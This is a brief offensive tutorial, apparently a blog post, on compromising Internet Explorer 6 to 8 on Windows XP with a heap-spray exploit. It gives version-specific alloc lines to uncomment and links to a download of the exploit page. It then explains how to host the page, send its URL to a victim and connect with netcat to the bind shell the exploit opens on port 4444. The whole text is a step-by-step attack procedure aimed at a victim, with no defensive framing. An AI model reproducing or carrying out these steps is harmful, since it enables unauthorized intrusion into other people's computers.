Type : Tutorial
Level : Easy
This tutorial is the same with IE 6,7,8 Exploit using Metasploit, but I try to make it more simple for you.
1. Arbitrary Code(Don't open it with Internet Explorer, but use text editor to modify)
FAKEOBJ = alloc(233120, FAKEOBJ); // IE6 mshtml.dll Version 6.0.2900.5512
//FAKEOBJ = alloc(241748, FAKEOBJ); // IE6 mshtml.dll Version 6.00.2900.6036 |
//FAKEOBJ = alloc(733120, FAKEOBJ); // IE7 mshtml.dll Version 7.00.6000.17080 |
//FAKEOBJ = alloc(433120, FAKEOBJ); // IE8 mshtml.dll Version 8.00.6001.18939 |
//FAKEOBJ = alloc(1294464, FAKEOBJ); // IE8 mshtml.dll Version 8.00.6001.18975 |
//FAKEOBJ = alloc(1550371, FAKEOBJ); // oy oy oy huge spray!
Uncomment which IE version you want to exploit. In this case I'm using IE6 in Win XP SP3.
Download Source Code
Mediafire.com |
2. NetCat (Windows/Linux)
My IP Address : 192.168.1.8 (attacker)
Victim IP Address : 192.168.1.3(Windows Xp SP3-IE6)
1. Create your own web server(For Windows user, you can use XAMPP). and copy the index.html in your htdocs/exploit/ folder. (You can view the tutorials here in option 1 and 2)
2. Open your NetCat, an do this command nc -nv 192.168.1.3 4444. We will try to connect using port 4444 because the arbitrary code will open port 4444 in remote computer.
If we execute the NetCat and user still not open the arbitrary code, there's nothing happened.
3. Send the URL to your victim (http://192.168.1.8/exploit/index.html) where index.html is your arbitrary code.
4. After the user open the URL, run once again your NetCat with nc -nv 192.168.1.3 4444 and see what's happen 🙂 You've already inside the victim computer.
DONE.
I hope this post is useful for you. If have any questions, just drop down your comment here.